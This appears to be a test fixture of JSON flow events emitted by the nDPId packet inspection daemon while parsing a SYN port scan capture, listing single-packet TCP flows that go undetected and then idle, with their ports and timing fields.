-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
